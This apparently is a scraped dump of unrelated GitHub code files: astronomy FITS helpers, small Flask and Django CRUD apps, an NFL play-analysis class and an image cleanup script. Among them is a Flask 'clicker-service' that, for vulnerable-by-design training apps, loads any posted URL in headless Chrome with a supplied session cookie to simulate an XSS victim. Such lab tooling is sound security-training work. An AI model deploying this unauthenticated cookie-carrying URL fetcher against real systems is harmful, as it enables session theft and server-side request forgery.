self._func\n\n def __set__(self, obj, value) -> None:\n self._is_default = False\n self._func = value\n\n\nclass FitsHelper:\n \"\"\"A class that handles basic FITS file functions.\"\"\"\n\n @staticmethod\n def create_file(file_name: str, data_shape: tuple, dtype) -> None:\n \"\"\"Creates a fits file without loading it into memory.\n\n This is a helper method to create large FITS files without loading an\n array into memory. 
The method follows the direction given at:\n http://docs.astropy.org/en/stable/generated/examples/io/skip_create-large-fits.html\n\n\n Args:\n file_name (str): the complete path to the file to be created.\n data_shape (tuple): a tuple describe the shape of the file to be\n created\n dtype (numpy datatype): the numpy datatype used in the array\n\n Raises:\n ValueError if dtype is not one of:\n - np.unit8\n - np.int16\n - np.int32\n - np.float32\n - np.float64\n\n\n TODO: Figure out why this throws warning about size occasionally\n when files that are created by it are opened\n \"\"\"\n bytes_per_value = 0\n\n if dtype == np.uint8:\n bytes_per_value = 1\n elif dtype == np.int16:\n bytes_per_value = 2\n elif dtype == np.int32:\n bytes_per_value = 4\n elif dtype == np.float32:\n bytes_per_value = 4\n elif dtype == np.float64:\n bytes_per_value = 8\n\n if bytes_per_value == 0:\n raise ValueError(\"Invalid dtype\")\n\n stub_size = [100, 100]\n if len(data_shape) == 3:\n stub_size.append(5)\n stub = np.zeros(stub_size, dtype=dtype)\n\n hdu = fits.PrimaryHDU(data=stub)\n header = hdu.header\n while len(header) < (36 * 4 - 1):\n header.append()\n\n header[\"NAXIS1\"] = data_shape[1]\n header[\"NAXIS2\"] = data_shape[0]\n if len(data_shape) == 3:\n header[\"NAXIS3\"] = data_shape[2]\n\n header.tofile(file_name)\n\n with open(file_name, \"rb+\") as f:\n header_size = len(header.tostring())\n data_size = (np.prod(data_shape) * bytes_per_value) - 1\n\n f.seek(header_size + data_size)\n f.write(b\"\\0\")\n\n @staticmethod\n def get_files(\n file_names: List[str], mode: str = \"readonly\"\n ) -> (List[fits.HDUList], List[np.ndarray]):\n \"\"\"Gets the HDULS and data handles for all the files in file_names.\n\n This is a convience function to opening multiple FITS files using\n memmap.\n\n Args:\n file_names (List[str]): a list of file names including paths to FITS\n files\n mode (str): the mode to pass to fits.open\n\n Returns:\n Tuple of a list numpy arrays that are the mmapped data handles for\n each of the FITS files and the HDULs that go along with them\n \"\"\"\n arrays = []\n hduls = []\n\n for f in file_names:\n hdul = fits.open(f, mode=mode, memmap=True)\n arrays.append(hdul[0].data) # Astropy problem pylint: disable=E1101\n hduls.append(hdul)\n\n return hduls, arrays\n\n @staticmethod\n def create_mean_var_files(\n shape: List[int], out_dir: str\n ) -> (List[fits.HDUList], List[np.ndarray]):\n \"\"\"Creates the output fits files for the mean/variance morpheus output.\n\n Args:\n shape (List[int]): The shape to use when making the FITS files\n out_dir (str): the directory to place the files in. 
Will make it\n if it doesn't already exist.\n\n Returns:\n List[fits.HDUList]: for the created files\n Dict(str, np.ndarray): a dictionary where the key is the data\n descriptor and the value is the memmapped\n data numpy array\n \"\"\"\n\n data_keys = []\n file_names = []\n for morph in LabelHelper.MORPHOLOGIES:\n for t in [\"mean\", \"var\"]:\n f = os.path.join(out_dir, f\"{morph}_{t}.fits\")\n file_names.append(f)\n data_keys.append(f\"{morph}_{t}\")\n\n FitsHelper.create_file(f, shape, np.float32)\n\n hduls, arrays = FitsHelper.get_files(file_names, mode=\"update\")\n\n return hduls, {k: v for k, v in zip(data_keys, arrays)}\n\n @staticmethod\n def create_rank_vote_files(\n shape: List[int], out_dir: str\n ) -> (List[fits.HDUList], List[np.ndarray]):\n \"\"\"Creates the output fits files for the rank vote morpheus output.\n\n Args:\n shape (List[int]): The shape to use when making the FITS files\n out_dir (str): the directory to place the files in. Will make it\n if it doesn't already exist.\n\n Returns:\n List[fits.HDUList]: for the created files\n Dict(str, np.ndarray): a dictionary where the key is the data\n descriptor and the value is the memmapped\n data numpy array\n \"\"\"\n\n data_keys = []\n file_names = []\n for morph in LabelHelper.MORPHOLOGIES:\n f = os.path.join(out_dir, f\"{morph}.fits\")\n file_names.append(f)\n data_keys.append(morph)\n\n FitsHelper.create_file(f, shape, np.float32)\n\n hduls, arrays = FitsHelper.get_files(file_names, mode=\"update\")\n\n return hduls, {k: v for k, v in zip(data_keys, arrays)}\n\n @staticmethod\n def create_n_file(\n shape: List[int], out_dir: str\n ) -> (List[fits.HDUList], List[np.ndarray]):\n \"\"\"Creates the output fits files for the rank vote morpheus output.\n\n Args:\n shape (List[int]): The shape to use when making the FITS files\n out_dir (str): the directory to place the files in. Will make it\n if it doesn't already exist.\n\n Returns:\n List[fits.HDUList]: for the created files\n Dict(str, np.ndarray): a dictionary where the key is the data\n descriptor and the value is the memmapped\n data numpy array\n \"\"\"\n\n n_path = os.path.join(out_dir, \"n.fits\")\n FitsHelper.create_file(n_path, shape, np.int16)\n hduls, arrays = FitsHelper.get_files([n_path], mode=\"update\")\n\n return hduls, {\"n\": arrays[0]}\n\n\nclass LabelHelper:\n \"\"\"Class to help with label updates.\n\n Class Variables:\n UPDATE_MASK (np.ndarray): the (40, 40) integer array that indicates which\n parts of the output of the model to include in the\n calculations. default: innermost (30,30)\n UPDATE_MASK_N (np.ndarray): the (40, 40) integer array that indicates which\n parts of the count 'n' to udpate. 
default:\n all (40, 40)\n \"\"\"\n\n MORPHOLOGIES = [\"spheroid\", \"disk\", \"irregular\", \"point_source\", \"background\"]\n\n UPDATE_MASK = np.pad(np.ones([30, 30]), 5, mode=\"constant\").astype(np.int16)\n UPDATE_MASK_N = np.ones([40, 40], dtype=np.int16)\n\n @staticmethod\n def index_generator(dim0: int, dim1: int) -> Iterable[Tuple[int, int]]:\n \"\"\"Creates a generator that returns indices to iterate over a 2d array.\n\n Args:\n dim0 (int): The upper limit to iterate up to for the first dimension\n dim1 (int): The upper limit to iterate up to for the second dimension\n\n Returns:\n A generator that yields indices to iterate over a 2d array with\n shape [dim0, dim1]\n \"\"\"\n for y in range(dim0):\n for x in range(dim1):\n yield (y, x)\n\n @staticmethod\n def windowed_index_generator(dim0: int, dim1: int) -> Iterable[Tuple[int, int]]:\n \"\"\"Creates a generator that returns window limited indices over a 2d array.\n\n THe generator returned by this method will yield the indices for the use\n of a sliding window of size `N_UPDATE_MASK.shape` over a 2d array with\n the size `(dim0, dim1)`.\n\n Args:\n dim0 (int): The upper limit to iterate up to for the first dimension\n dim1 (int): The upper limit to iterate up to for the second dimension\n\n Returns:\n A generator that yields indices to iterate over a 2d array with\n shape [dim0, dim1]\n \"\"\"\n\n window_y, window_x = LabelHelper.UPDATE_MASK_N.shape\n final_y = dim0 - window_y + 1\n final_x = dim1 - window_x + 1\n\n return LabelHelper.index_generator(final_y, final_x)\n\n @staticmethod\n def get_final_map(shape: List[int], y: int, x: int):\n \"\"\"Creates a pixel mapping that flags pixels that won't be updated again.\n\n Args:\n shape (List[int]): the shape of the array that x and y are indexing\n y (int): the current y index\n x (int): the current x index\n\n Returns:\n A list of relative indices that won't be updated again.\n \"\"\"\n final_map = []\n\n end_y = y == (shape[0] - LabelHelper.UPDATE_MASK_N.shape[0])\n end_x = x == (shape[1] - LabelHelper.UPDATE_MASK_N.shape[1])\n\n if end_y and end_x:\n for _y in range(5, 35):\n for _x in range(5, 35):\n final_map.append((_y, _x))\n else:\n if end_x:\n final_map.extend([(5, _x) for _x in range(5, 35)])\n if end_y:\n final_map.extend([(_y, 5) for _y in range(5, 35)])\n\n if not final_map:\n final_map.append((5, 5))\n\n return final_map\n\n @staticmethod\n def iterative_mean(\n n: np.ndarray, curr_mean: np.ndarray, x_n: np.ndarray, update_mask: np.ndarray\n ):\n \"\"\"Calculates the mean of collection in an online fashion.\n\n The values are calculated using the following equation:\n http://people.ds.cam.ac.uk/fanf2/hermes/doc/antiforgery/stats.pdf, eq. 
4\n\n Args:\n n (np.ndarray): a 2d array containing the number of terms in mean so\n far,\n prev_mean (np.ndarray): the current calculated mean.\n x_n (np.ndarray): the new values to add to the mean\n update_mask (np.ndarray): a 2d boolean array indicating which\n indices in the array should be updated.\n\n Returns:\n An array with the same shape as the curr_mean with the newly\n calculated mean values.\n \"\"\"\n _n = n.copy()\n _n[_n == 0] = 1\n return curr_mean + ((x_n - curr_mean) / _n * update_mask)\n\n @staticmethod\n def iterative_variance(\n prev_sn: np.ndarray,\n x_n: np.ndarray,\n prev_mean: np.ndarray,\n curr_mean: np.ndarray,\n update_mask: np.ndarray,\n ):\n \"\"\"The first of two methods used to calculate the variance online.\n\n This method specifically calculates the $S_n$ value as indicated in\n equation 24 from:\n\n http://people.ds.cam.ac.uk/fanf2/hermes/doc/antiforgery/stats.pdf\n\n Args:\n prev_sn (np.ndarray): the $S_n$ value from the previous step\n x_n (np.ndarray): the current incoming values\n prev_mean (np.ndarray): the mean that was previously calculated\n curr_mean (np.ndarray): the mean, including the current values\n update_mask (np.ndarray): a boolean mask indicating which values to\n update\n\n Returns:\n An np.ndarray containg the current value for $S_n$\n\n\n \"\"\"\n return prev_sn + ((x_n - prev_mean) * (x_n - curr_mean) * update_mask)\n\n @staticmethod\n def finalize_variance(\n n: np.ndarray, curr_sn: np.ndarray, final_map: List[Tuple[int, int]]\n ):\n \"\"\"The second of two methods used to calculate the variance online.\n\n This method calculates the final variance value using equation 25 from\n\n http://people.ds.cam.ac.uk/fanf2/hermes/doc/antiforgery/stats.pdf\n\n but without performing the square root.\n\n Args:\n n (np.ndarray): the current number of values included in the calculation\n curr_sn (np.ndarray): the current $S_n$ values\n final_map List[(y, x)]: a list of indices to calculate the final\n variance for\n\n Returns:\n A np.ndarray with the current $S_n$ values and variance values for\n all indices in final_map\n \"\"\"\n final_n = np.ones_like(n)\n for y, x in final_map:\n final_n[y, x] = n[y, x]\n\n return curr_sn / final_n\n\n @staticmethod\n def iterative_rank_vote(\n x_n: np.ndarray, prev_count: np.ndarray, update_mask: np.ndarray\n ):\n \"\"\"Calculates the updated values for the rank vote labels for a one class.\n\n Args:\n x_n (np.ndarray): the current rank vote values for the class being\n updated\n prev_count (np.ndarray): the array containing the running totals,\n should be shaped as [labels, height, width]\n update_mask (np.ndarray): a boolean array indicating which values to\n update\n\n Returns:\n A numpy array containing the updated count values\n \"\"\"\n update = np.zeros_like(prev_count)\n\n for i in range(update.shape[0]):\n for j in range(update.shape[1]):\n if update_mask[i, j] and (x_n[i, j] == 4):\n update[i, j] = 1\n\n count = prev_count + update\n\n return count\n\n @staticmethod\n def update_ns(data: dict, batch_idx: List[Tuple[int, int]], inc: int = 1) -> None:\n \"\"\"Updates the n values by `inc`.\n\n Args:\n data (dict): a dictionary of numpy arrays containing the data\n batch_idx (List[Tuple[int, int]]): a list of indices to update\n inc (int): the number to increment `n` by. 
Default=1\n\n Returns\n None\n \"\"\"\n window_y, window_x = LabelHelper.UPDATE_MASK_N.shape\n for y, x in batch_idx:\n ys = slice(y, y + window_y)\n xs = slice(x, x + window_x)\n\n ns = data[\"n\"][ys, xs]\n n_update = LabelHelper.UPDATE_MASK_N * LabelHelper.UPDATE_MASK * inc\n ns = ns + n_update\n data[\"n\"][ys, xs] = ns\n\n @staticmethod\n def update_mean_var(\n data: dict, labels: np.ndarray, batch_idx: List[Tuple[int, int]]\n ):\n \"\"\"Updates the mean and variance outputs with the new model values.\n\n Args:\n data (dict): a dict of numpy arrays containing the data\n labels (np.ndarray): the new output from the model\n batch_idx (List[Tuple[int, int]]): a list of indices to update\n\n Returns:\n None\n \"\"\"\n\n window_y, window_x = LabelHelper.UPDATE_MASK_N.shape\n total_shape = data[\"n\"].shape\n for i, l in enumerate(labels):\n y, x = batch_idx[i]\n LabelHelper.update_ns(data, [(y, x)])\n ys = slice(y, y + window_y)\n xs = slice(x, x + window_x)\n\n final_map = LabelHelper.get_final_map(total_shape, y, x)\n n = data[\"n\"][ys, xs]\n for j, morph in enumerate(LabelHelper.MORPHOLOGIES):\n k_mean = f\"{morph}_mean\"\n k_var = f\"{morph}_var\"\n\n x_n = l[:, :, j]\n prev_mean = data[k_mean][ys, xs]\n prev_var = data[k_var][ys, xs]\n\n mean = LabelHelper.iterative_mean(\n n, prev_mean, x_n, LabelHelper.UPDATE_MASK\n )\n\n var = LabelHelper.iterative_variance(\n prev_var, x_n, prev_mean, mean, LabelHelper.UPDATE_MASK\n )\n var = LabelHelper.finalize_variance(n, var, final_map)\n\n data[k_mean][ys, xs] = mean\n data[k_var][ys, xs] = var\n\n @staticmethod\n def update_rank_vote(\n data: dict, labels: np.ndarray, batch_idx: List[Tuple[int, int]]\n ) -> None:\n \"\"\"Updates the rank vote values with the new output.\n\n Args:\n data (dict): data (dict): a dict of numpy arrays containing the data\n labels (np.ndarray): the new output from the model\n batch_idx (List[Tuple[int, int]]): a list of indices to update\n\n Returns:\n None\n \"\"\"\n\n window_y, window_x = LabelHelper.UPDATE_MASK_N.shape\n for i, l in enumerate(labels):\n y, x = batch_idx[i]\n ys = slice(y, y + window_y)\n xs = slice(x, x + window_x)\n\n ranked = l.argsort().argsort()\n for j, morph in enumerate(LabelHelper.MORPHOLOGIES):\n prev_count = data[morph][ys, xs]\n\n count = LabelHelper.iterative_rank_vote(\n ranked[:, :, j], prev_count, LabelHelper.UPDATE_MASK\n )\n\n data[morph][ys, xs] = count\n\n @staticmethod\n def update_labels(\n data: dict, labels: np.ndarray, batch_idx: List[Tuple[int, int]], out_type: str\n ) -> None:\n \"\"\"Updates the running total label values with the new output values.\n\n Args:\n data (dict): data (dict): a dict of numpy arrays containing the data\n labels (np.ndarray): the new output from the model\n batch_idx (List[Tuple[int, int]]): a list of indices to update\n out_type (str): indicates which type of output to update must be\n one of ['mean_var', 'rank_vote', 'both']\n\n Returns:\n None\n \"\"\"\n\n if out_type == \"mean_var\":\n LabelHelper.update_mean_var(data, labels, batch_idx)\n elif out_type == \"rank_vote\":\n LabelHelper.update_ns(data, batch_idx)\n LabelHelper.update_rank_vote(data, labels, batch_idx)\n else:\n LabelHelper.update_mean_var(data, labels, batch_idx)\n LabelHelper.update_rank_vote(data, labels, batch_idx)\n\n @staticmethod\n def make_mean_var_arrays(shape: Tuple[int, int]) -> dict:\n \"\"\"Create output arrays for use in in-memory classification.\n\n Args:\n shape (Tuple[int]): The 2d (width, height) for to create the arrays\n\n Returns\n A dictionary with 
keys being the arrays description and values being\n the array itself\n \"\"\"\n\n arrays = {}\n\n for morph in LabelHelper.MORPHOLOGIES:\n for t in [\"mean\", \"var\"]:\n arrays[f\"{morph}_{t}\"] = np.zeros(shape, dtype=np.float32)\n\n return arrays\n\n @staticmethod\n def make_rank_vote_arrays(shape: Tuple[int, int]) -> dict:\n \"\"\"Create output arrays for use in in-memory classification.\n\n Args:\n shape (Tuple[int]): The 2d (width, height) for to create the arrays\n\n Returns\n A dictionary with keys being the arrays description and values being\n the array itself\n \"\"\"\n shape = [shape[0], shape[1]]\n arrays = {}\n\n for morph in LabelHelper.MORPHOLOGIES:\n arrays[morph] = np.zeros(shape, dtype=np.float32)\n\n return arrays\n\n @staticmethod\n def make_n_array(shape: Tuple[int, int]) -> dict:\n \"\"\"Create an output array for use in in-memory classification.\n\n Args:\n shape (Tuple[int]): The 2d (width, height) for to create the arrays\n\n Returns\n A dictionary with keys being the arrays description and values being\n the array itself\n \"\"\"\n return {\"n\": np.zeros(shape, dtype=np.int16)}\n\n @staticmethod\n def finalize_rank_vote(data: dict) -> None:\n \"\"\"Finalize the rank vote by dividing by n.\n\n Args:\n data (dict): a dict of numpy arrays containing the data\n\n TODO: Refactor to accommodate large files\n\n Returns:\n None\n \"\"\"\n\n n = data[\"n\"]\n\n for morph in LabelHelper.MORPHOLOGIES:\n m = data[morph].copy()\n m = np.divide(m, n, out=np.zeros_like(m, dtype=np.float32), where=n != 0)\n data[morph][:, :] = m[:, :]\n","repo_name":"morpheus-project/morpheus","sub_path":"morpheus/core/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":23681,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"54"} +{"seq_id":"36993739442","text":"from flask import Flask, render_template, url_for, request, redirect\nfrom students import Students\nfrom flask_modus import Modus\n\napp = Flask(__name__)\nmodus = Modus(app)\n\nstudents_list = []\n\n\n@app.route('/')\ndef root():\n return redirect(url_for('index'))\n\n\n@app.route('/students', methods=['GET', 'POST'])\ndef index():\n if request.method == 'POST':\n new_student = Students(request.form['first_name'], request.form['last_name'])\n students_list.append(new_student)\n return redirect(url_for('index'))\n return render_template('index.html', students=students_list)\n\n\n@app.route('/students/new')\ndef new():\n return render_template('new.html')\n\n\n@app.route('/students/', methods=['GET','PATCH', 'DELETE'])\ndef find(id):\n student = [student for student in students_list if student.id == id][0]\n if request.method == b'PATCH':\n student.first_name = request.form['first_name']\n student.last_name = request.form['last_name']\n return redirect(url_for('index'))\n if request.method == b'DELETE':\n students_list.remove(student)\n return redirect(url_for('index'))\n return render_template('find.html', student=student)\n\n\n@app.route('/students//edit')\ndef edit_user(id):\n student = [student for student in students_list if student.id == id][0]\n return render_template('edit.html', student=student)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"dragosbus/rithmschool-flask","sub_path":"introduction/lecture/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19886385975","text":"from typing import List\n\nfrom 
.database import SessionLocal\nfrom model.book import DbBook\nfrom view_model.book import Book as Book\n\n\nclass BookCtl:\n\n @classmethod\n def create_book(cls, book: Book):\n book = DbBook(**book.dict())\n session = SessionLocal()\n try:\n session.add(book)\n session.commit()\n finally:\n session.close()\n return {\"code\": 200}\n\n @classmethod\n def update_book(cls, book: Book):\n session = SessionLocal()\n try:\n book_for_update: DbBook = session.query(DbBook).filter(DbBook.id == book.id).first()\n if book_for_update is None:\n return {\"code\": 204}\n else:\n book_for_update.title = book.title\n book_for_update.wordNum = book.wordNum\n book_for_update.author_id=book.author_id\n session.commit()\n return {\"code\": 200}\n finally:\n session.close()\n\n @classmethod\n def get_book(cls, id: int):\n session = SessionLocal()\n try:\n book = session.query(DbBook).filter(DbBook.id == id).first()\n finally:\n session.close()\n if book is None:\n return {}\n else:\n return Book(id=book.id, title=book.title, wordNum=book.wordNum, author_id=book.author_id)\n\n # 支持分页查询,page是页码,从0开始,page_size为每页记录数\n @classmethod\n def get_books(cls, page: int, page_size: int):\n session = SessionLocal()\n l: List[Book] = []\n try:\n books = session.query(DbBook).offset(page * page_size).limit(page_size).all()\n finally:\n session.close()\n for book in books:\n l.append(Book(id=book.id, title=book.title, wordNum=book.wordNum, author_id=book.author_id))\n return l\n\n @classmethod\n def delete_book(cls, id: int):\n session = SessionLocal()\n try:\n rows = session.query(DbBook).filter(DbBook.id == id).delete()\n session.commit()\n finally:\n session.close()\n return rows\n","repo_name":"iyuanfang/studypy","sub_path":"control/book_ctl.py","file_name":"book_ctl.py","file_ext":"py","file_size_in_byte":2146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71993641120","text":"import numpy as np\nimport pandas as pd\nimport scipy as sp\n\nimport matplotlib.pyplot as plt\n\nimport os\nimport glob\n\nclass Game:\n def __init__(self, gameId, opponent, game_info, play_data, location):\n self.gameId = gameId\n self.opponent = opponent\n self.location = location\n self.game_info = game_info\n\n self.play_data = play_data\n\n self.plays = []\n\n @property\n def nPlays(self):\n return len(self.plays)\n\n @property\n def info(self):\n return str(self)\n\n @property\n def numberForwardPassPlays(self):\n count = 0\n for play in self.plays:\n if play.hasForwardPass:\n count += 1\n\n return count\n\n def __str__(self):\n week = self.game_info['week']\n home_team = self.game_info['homeTeamAbbr']\n away_team = self.game_info['visitorTeamAbbr']\n opponent = self.opponent\n date = self.game_info['gameDate'].replace('/','-')\n\n if opponent == home_team:\n return f'Week {week} - {away_team} at {home_team} ({date})'\n elif opponent == away_team:\n return f'Week {week} - {home_team} vs {away_team} ({date})'\n\n def list_plays(self):\n for i in range(len(self.plays)):\n print(f'Play {i+1}: {self.plays[i]}')\n\n def process_plays(self, players):\n for play in self.plays:\n try:\n play.process_players(players)\n if play.hasForwardPass:\n play.find_dropback_events()\n play.process_coverage()\n except:\n print(\"Play Error\")\n print(f'Game ID: {self.gameId} - Play ID: {play.playId}')\n print(play)\n continue\n\n\n def classify_defensive_coverage_shells(self):\n defensive_shells = {}\n defensive_shells['cover 0'] = 0\n defensive_shells['cover 1'] = 0\n defensive_shells['cover 2'] = 
0\n defensive_shells['cover 3'] = 0\n defensive_shells['cover 4'] = 0\n defensive_shells['cover 6'] = 0\n\n for play in self.plays:\n if play.hasForwardPass:\n coverage_shell = play.defensive_coverage_shell\n defensive_shells[coverage_shell] += 1\n\n return defensive_shells\n\n def classify_defensive_back_coverages(self, percentage=False, positions=['CB','LB','S'], useId=False):\n\n movement_to_zone_threshold = -0.5\n deep_zone_threshold = 10\n\n coverage_counts = {}\n coverage_names = ('zone','zone-deep','zone-over','man','man-over','blitz')\n \n for play in self.plays:\n \n dbacks = []\n if 'CB' in positions:\n dbacks += play.return_players_by_position('CB')\n if 'LB' in positions:\n dbacks += play.return_linebackers()\n if 'S' in positions:\n dbacks += play.return_safeties()\n \n for dback in dbacks:\n #print(f'Defensive Player Name: {dback.name}')\n if dback.name is None:\n continue\n\n if useId == True:\n player_key = dback.nflId\n else:\n player_key = dback.name\n\n if not player_key in coverage_counts:\n coverage_options = {}\n coverage_options['snaps'] = 0\n for coverage_name in coverage_names:\n coverage_options[coverage_name] = 0\n\n coverage_counts[player_key] = coverage_options\n\n _coverage = dback.coverage\n\n if _coverage is None: # No coverage currently calculated on sacks\n continue\n\n if _coverage == 'zone':\n zone_depth = dback.zone_loc[0] - play.line_of_scrimmage\n\n try:\n movement_to_zone = dback.distance_from_line(play.events['pass_forward']) - dback.distance_from_line(play.events['ball_snap'])\n except:\n continue\n\n if dback.safety_help is None:\n _coverage += '-deep'\n if dback.safety_help == False and zone_depth > deep_zone_threshold and movement_to_zone > movement_to_zone_threshold:\n _coverage += '-deep'\n elif dback.safety_help == True:\n _coverage += '-over'\n \n if _coverage == 'man':\n if dback.safety_help == True:\n _coverage += '-over'\n\n coverage_counts[player_key][_coverage] += 1\n coverage_counts[player_key]['snaps'] += 1\n\n if percentage:\n for counts in coverage_counts.values():\n N = counts['snaps']\n for coverage_name in coverage_names:\n counts[coverage_name] = round(counts[coverage_name] / N,2)\n\n return coverage_counts\n\n def calculate_offensive_production(self, useId=False, verbose=False):\n i = 1\n receiver_data = {}\n for play in self.plays:\n #print(play)\n if play.special_event is not None:\n if verbose:\n print(f'Play {i} Removed for ' + play.special_event[0])\n\n receivers = play.return_receivers()\n\n if verbose:\n print(f'Play {i}')\n\n for rc in receivers:\n\n if rc.name is None:\n continue\n\n if useId == True:\n player_key = rc.nflId\n else:\n player_key = rc.name\n\n if not player_key in receiver_data:\n player_data = {}\n player_data['snaps'] = 0\n player_data['targets'] = 0\n player_data['epa'] = 0\n #player_data['target epa'] = 0\n\n receiver_data[player_key] = player_data\n\n receiver_data[player_key]['snaps'] += 1\n\n try:\n if rc is play.target:\n receiver_data[player_key]['targets'] += 1\n receiver_data[player_key]['epa'] += play.epa\n except:\n if verbose:\n print(play)\n continue\n\n i += 1\n\n return receiver_data\n\n\n ","repo_name":"jhowenstein/nfl-big-data","sub_path":"src/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":6476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71898190241","text":"# Back to the original\n# 증폭을 했는데 다시 되돌리고 싶을 때 쓰는 파일\n# 즉, 48개의 이미지만 제외하고 다 제거하고 싶을 때 사용\n\nfrom natsort import natsorted\nimport 
os\n\nTRAIN_DIR = 'C:/data/LPD_competition/train'\ntrain_fnames = natsorted(os.listdir(TRAIN_DIR))\n\noriginal_img = ['0.jpg','1.jpg','2.jpg','3.jpg','4.jpg','5.jpg','6.jpg','7.jpg','8.jpg','9.jpg',\\\n '10.jpg','11.jpg','12.jpg','13.jpg','14.jpg','15.jpg','16.jpg','17.jpg','18.jpg','19.jpg',\\\n '20.jpg','21.jpg','22.jpg','23.jpg','24.jpg','25.jpg','26.jpg','27.jpg','28.jpg','29.jpg',\\\n '30.jpg','31.jpg','32.jpg','33.jpg','34.jpg','35.jpg','36.jpg','37.jpg','38.jpg','39.jpg',\\\n '40.jpg','41.jpg','42.jpg','43.jpg','44.jpg','45.jpg','46.jpg','47.jpg']\n\nfor idx, folder in enumerate(train_fnames): # 1000개의 폴더에 대하여\n # if idx >= 1: # 폴더 1개만 시험삼아 해보기\n # break\n\n base_dir = TRAIN_DIR + '/' + folder + '/' # 'C:/data/LPD_competition/train/0/'\n img_lst = natsorted(os.listdir(base_dir))\n print(\"deleting\", idx, \"th folder...\")\n for img in img_lst:\n if img not in original_img:\n os.remove(base_dir + str(img))","repo_name":"biggymart/study","sub_path":"Contest/3_Lotte/mine/1_deaugment_img.py","file_name":"1_deaugment_img.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1014771614","text":"# Service to support vulnerable by design web applications.\n# Flask server receives POST requests and \"clicks\" malicious\n# links with headless chrome browser\n# Probably shouldn't expose this app to public networks\n\n# Form data for POST requests:\n# url: required. URL encoded url to be visited\n# cookie_name: optional. Cookie name to be set for visiting (simulate user)\n# cookie_value: optional. Value for cookie_name. \n\n# Both cookie_name and cookie_value must be received to set the cookie.\n# Otherwise the malicious link will be visited without a cookie set.\n\n# import flask relevant libraries\nfrom urllib.parse import unquote_plus\nfrom flask import Flask\nfrom flask import request\n\n# import selenium relevant libraries\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.chrome.options import Options\n\n# initialize flask app\napp = Flask(__name__)\n\n# initialize headless chrome browser\nchrome_options = Options()\nchrome_options.add_argument(\"--headless\")\ndriver = webdriver.Chrome(chrome_options=chrome_options)\n\n# Route set to \"/clicker\" to avoid scanners randomly tripping service\n@app.route('/clicker', strict_slashes=False, methods = ['POST'])\ndef clicker():\n \"\"\"Receive URL to click, and make request\"\"\"\n # only accept POST\n if request.method == 'POST':\n data = request.form\n # url var is minimum required to \"click\" malicious link\n if \"url\" in data.keys():\n # url decode incoming url\n target_url = unquote_plus(data['url'])\n # if cookie values are provided, set cookie for malicious \"click\"\n if \"cookie_name\" in data.keys() and \"cookie_value\" in data.keys():\n \n driver.set_page_load_timeout(1)\n \n # selenium can't set a cookie without being \"at\" the domain\n # so we hit a known 404 address, then add the cookie to the session\n driver.get(f\"{target_url}/thisaddressshouldntexist\")\n driver.add_cookie({'name': unquote_plus(data['cookie_name']), 'value': unquote_plus(data['cookie_value'])})\n try:\n # \"Click\" malicious link\n driver.set_page_load_timeout(1)\n driver.get(target_url)\n except TimeoutException as ex:\n isrunning = 0\n return f\"Exception has been thrown. 
{str(ex)}\"\n\n return \"Done\"\n else:\n return \"This endpoint requires a url parameter.\"\n\n else:\n return \"STATUS 405 - Method Not Allowed\"\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0')\n","repo_name":"fabraun/clicker-service","sub_path":"clicker/clicker-service.py","file_name":"clicker-service.py","file_ext":"py","file_size_in_byte":2682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14535147462","text":"from django.conf import settings\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django_mako_plus import view_function\nfrom datetime import datetime\nfrom .. import dmp_render, dmp_render_to_string\nfrom catalog import models as cmod\nfrom django.contrib.auth.decorators import login_required, permission_required\n\nfrom formlib.form import FormMixIn\nfrom django import forms\n\n@view_function\n@permission_required('catalog.change_product')\ndef process_request(request):\n\n try:\n product = cmod.Product.objects.get(id=request.urlparams[0])\n\n except cmod.Product.DoesNotExist:\n return HttpResponseRedirect('/manager/products/')\n\n # process the form\n form = ProductEditForm(request, product=product, initial= {\n 'name': product.name,\n 'category': product.category,\n 'price': product.price,\n 'graphic' : product.graphic,\n #BulkProduct\n 'barcode': getattr(product, 'barcode', 0),\n 'quantity': getattr(product, 'quantity', 0),\n 'reorder_trigger': getattr(product, 'reorder_trigger', 0),\n 'reorder_quantity': getattr(product, 'reorder_quantity', 0),\n #UniqueProduct\n 'serial_number': getattr(product, 'serial_number', 0),\n 'barcode': getattr(product, 'barcode', 0),\n 'condition': getattr(product, 'condition', 0),\n #RentalProduct\n 'is_rented': getattr(product, 'is_rented', 0),\n 'due_date': getattr(product, 'due_date', 0),\n\n })\n if form.is_valid():\n form.commit(product)\n return HttpResponseRedirect('/manager/products/')\n\n context = {\n 'product': product,\n 'form': form,\n }\n\n return dmp_render(request, 'product.html', context)\n\n\n\nclass ProductEditForm(FormMixIn, forms.Form):\n def init(self, product):\n '''Initialize the form (called at end of __init__)'''\n # add fields here\n #Product Fields:\n self.fields['name'] = forms.CharField(label=\"Product Name\", max_length=100)\n self.fields['category'] = forms.ModelChoiceField(label='Category',\n queryset=cmod.Category.objects.order_by('name').all())\n self.fields['price'] = forms.DecimalField(label='Price')\n self.fields['graphic'] = forms.CharField(label='Graphic')\n #BulkProduct Fields:\n if hasattr(product, 'barcode'):\n self.fields['barcode'] = forms.CharField(label='Barcode')\n if hasattr(product, 'quantity'):\n self.fields['quantity'] = forms.IntegerField(label='Quantity')\n if hasattr(product, 'reorder_trigger'):\n self.fields['reorder_trigger'] = forms.IntegerField(label='Reorder Trigger')\n if hasattr(product, 'reorder_quantity'):\n self.fields['reorder_quantity'] = forms.IntegerField(label='Reorder Quantity')\n\n #UniqueProduct Fields:\n if hasattr(product, 'serial_number'):\n self.fields['serial_number'] = forms.CharField(label='Serial Number')\n if 